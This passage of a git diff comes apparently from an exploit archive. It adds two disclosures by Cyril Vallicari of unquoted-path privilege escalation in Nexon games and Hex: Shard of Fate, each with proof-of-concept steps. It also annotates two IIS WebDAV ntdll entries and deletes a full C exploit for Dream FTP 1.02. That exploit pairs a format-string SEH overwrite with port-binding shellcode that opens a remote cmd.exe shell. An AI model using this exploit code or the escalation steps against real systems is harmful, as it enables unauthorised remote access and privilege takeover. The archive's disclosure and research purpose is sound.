ff7104 push dword ptr [ecx+4] ds:0023:00000004=???????? + +---------------------------------------------------------------------- +By: HauntIT Blog @ 2016 diff --git a/platforms/windows/local/39102..py b/platforms/windows/local/39102.py similarity index 100% rename from platforms/windows/local/39102..py rename to platforms/windows/local/39102.py diff --git a/platforms/windows/local/39809..cs b/platforms/windows/local/39809.cs similarity index 100% rename from platforms/windows/local/39809..cs rename to platforms/windows/local/39809.cs diff --git a/platforms/windows/local/39814.txt b/platforms/windows/local/39814.txt new file mode 100755 index 000000000..599aca506 --- /dev/null +++ b/platforms/windows/local/39814.txt @@ -0,0 +1,34 @@ +----------------------------------------------------------------------------------------------------------------- +# Exploit Title: Multiples Nexon Games - Privilege Escalation Unquoted path vulnerabilities +# Date: 13/05/2016 +# Exploit Author : Cyril Vallicari +# Vendor Homepage: http://www.nexon.net/ +# Softwares Links: http://dirtybomb.nexon.net/ (DirtyBomb) +# http://store.steampowered.com/app/273110/ (CSNZ) +# Versions: Dirty Bomb r56825 USA_EU / CSNZ : 0.0.18845.1 +# Tested on: Windows 7 x64 SP1 (but it should works on all windows version) + +Description : Multiples Nexon Game, including but not limited to Dirty Bomb +and Counter-Strike Nexon : Zombies, are Prone to unquoted path +vulnerability. They fail to quote correctly the command that call for +BlackXcht.aes, which is a part of the anti-cheat system (Nexon Game +Security). Probably all Nexon games calling this file are affected. + +This could potentially allow an authorized but non-privileged local user to +execute arbitrary code with elevated privileges on the system. + +POC : + +Put a software named Program.exe in C: + +Launch the game via steam + +When BlackXcht.aes is called, Program.exe is executed with same rights as +steam + +POC video : https://www.youtube.com/watch?v=wcn62GGwtcQ + +Patch : + +Patch for Dirty bomb - Upgrade to r57457 USA_EU +----------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/local/39820.txt b/platforms/windows/local/39820.txt new file mode 100755 index 000000000..29f970109 --- /dev/null +++ b/platforms/windows/local/39820.txt @@ -0,0 +1,38 @@ +----------------------------------------------------------------------------------------------------------------- +# Exploit Title: Hex : Shard of Fate 1.0.1.026 - Privilege +Escalation Unquoted path vulnerability +# Date: 15/05/2016 +# Exploit Author : Cyril Vallicari +# Vendor Homepage: http://gameforge.com +# Software Link: https://hex.gameforge.com/ or via steam +# Version: 1.0.1.026 and probably prior +# Tested on: Windows 7 x64 SP1 (but it should works on all windows version) + +Summary : Hex: Shard of Fate is a new breed of digital card game, combining +classic TCG gameplay with elements of an online RPG + +Description : The game executable is prone to an unquoted path +vulnerability. When you go to the in-game store it fail to quote the +following command which is used multiple times : + +C:/Program Files (x86)/Steam/steamapps/common/HEX SHARDS OF +FATE/Hex_Data/StreamingAssets/uWebKit/Windows/x86/UWKProcess.exe -parentpid +5808 +-processdb QzovVXNlcnMvVXRpbGlzYXRldXIvQXBwRGF0YS9Mb2NhbExvdy9IRVggRW50ZXJ0YWlubWVu +dC9IZXgvdVdlYktpdFByb2Nlc3MuZGI= + +This could potentially allow an authorized but non-privileged local user to +execute arbitrary code with elevated privileges on the system. + +POC : + +Put a software named Program.exe in C: + +Launch the game or steam with high privileges and go to store + +POC video : https://www.youtube.com/watch?v=E1_1wZea1ck + +Patch : + +Still waiting, no reward so full disclosure after 10 days +----------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/22365.pl b/platforms/windows/remote/22365.pl index c0a3beff5..aad8d9453 100755 --- a/platforms/windows/remote/22365.pl +++ b/platforms/windows/remote/22365.pl @@ -1,3 +1,5 @@ +E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/ + source: http://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. diff --git a/platforms/windows/remote/22367.txt b/platforms/windows/remote/22367.txt index 32a569312..d561e14df 100755 --- a/platforms/windows/remote/22367.txt +++ b/platforms/windows/remote/22367.txt @@ -1,3 +1,5 @@ +E-DB Note: Updated Exploit ~ https://www.exploit-db.com/exploits/22368/ + source: http://www.securityfocus.com/bid/7116/info The Windows library ntdll.dll includes a function that does not perform sufficient bounds checking. The vulnerability is present in the function "RtlDosPathNameToNtPathName_U" and may be exploited through other programs that use the library if an attack vector permits it. One of these programs is the implementation of WebDAV that ships with IIS 5.0. The vector allows for the vulnerability in ntdll.dll to be exploited by a remote attacker. diff --git a/platforms/windows/remote/23661.c b/platforms/windows/remote/23661.c deleted file mode 100755 index 546ba3627..000000000 --- a/platforms/windows/remote/23661.c +++ /dev/null @@ -1,102 +0,0 @@ -source: http://www.securityfocus.com/bid/9600/info - -It has been reported that Dream FTP Server may be prone to a remote format string vulnerability when processing a malicious request from a client for a username during FTP authentication. The issue could crash the server. - -Dream FTP Server version 1.02 has been reported to be prone to this issue, however, it is possible that other versions may be affected by this issue as well. - -#include -#include -#include -#include - -// WIN NT/2K/XP cmd.exe shellcode -// kernel32.dll baseaddress calculation: OS/SP-independent -// string-save: 00, 0a and 0d free. -// portbinding: port 28876 -// looping: reconnect after disconnect -char* shellcode = - "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52" - "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1" - "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a" - "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" - "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b" - "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32" - "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff" - "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe" - "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50" - "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff" - "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89" - "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff" - "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60" - "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89" - "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56" - "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53" - "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53" - "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf" - "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf" - "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff" - "\x83\xc4\x5c\x61\xeb\x89"; - -int main(int argc, char *argv[], char *envp[]) { - int sock; - FILE* FILEsock; - struct sockaddr_in addr; - int port = 21; - char buffer[1024]; - - if (argc<2 || argc>3) { - printf("Usage: %s IP [PORT]\n", argv[0]); - exit(-1); - } - if (argc == 3) port = atoi(argv[2]); - - printf("- Nightmare --------------------------------------------------\n" - " Dream FTP v1.2 formatstring exploit.\n" - " Written by SkyLined .\n" - " Credits for the vulnerability go to badpack3t\n" - " .\n" - " Shellcode based on work by H D Moore (www.metasploit.com).\n" - " Greets to everyone at 0dd and #netric.\n" - " (K)(L)(F) for Suzan.\n" - "\n" - " Binds a shell at %s:28876 if successfull.\n" - " Tested with: WIN2KEN/Dream FTP v1.2 (1.02/TryFTP 1.0.0.1)\n" - "--------------------------------------------------------------\n", - argv[1]); - - addr.sin_family = AF_INET; - addr.sin_port = htons(port); - addr.sin_addr.s_addr = inet_addr(argv[1]); - - if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1 || - connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1 || - (FILEsock = fdopen(sock, "r+")) == NULL) { - fprintf(stderr, "\n[-] Connection to %s:%d failed: ", argv[1], port); - perror(NULL); - exit(-1); - } - - printf("\n[+] Connected to %s:%d.\n", argv[1], port); - do printf(" --> %s", fgets(buffer, sizeof buffer, FILEsock)); - while (strstr(buffer, "220-") == buffer); - - printf("\n[+] Sending exploit string...\n"); - fprintf(FILEsock, - // Argument 10 points to the SEH handler code, it's RWE so we'll change - // the SEH handler to redirect execution to the beginning of our - // formatstring. When the SEH handler is called [ebx+0x3c] points - // to the start of our formatstring, we just have to jump over the - // formatstring exploit itself to our shellcode: - "\xeb\x29" // Jump over the formatstring exploit - "%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%8x%%%dd%%n" // Argument 10 -> SEH - "%%n" // Causes exception after SEH adjustment. - "@@@@@@@@" // nopslide landing zone for jump - "%s\r\n", // shellcode - 0x3C63FF-0x4f, // New SEH code = 0x3C63FF (jmp *0x3c(%ebx) | jmp [EBX+0x3C]) - shellcode); - fflush(FILEsock); - close(sock); - printf("\n[+] Done, allow a few seconds on a slow target before you can\n" - " connect to %s:28876.\n", argv[1]); - return 0; -}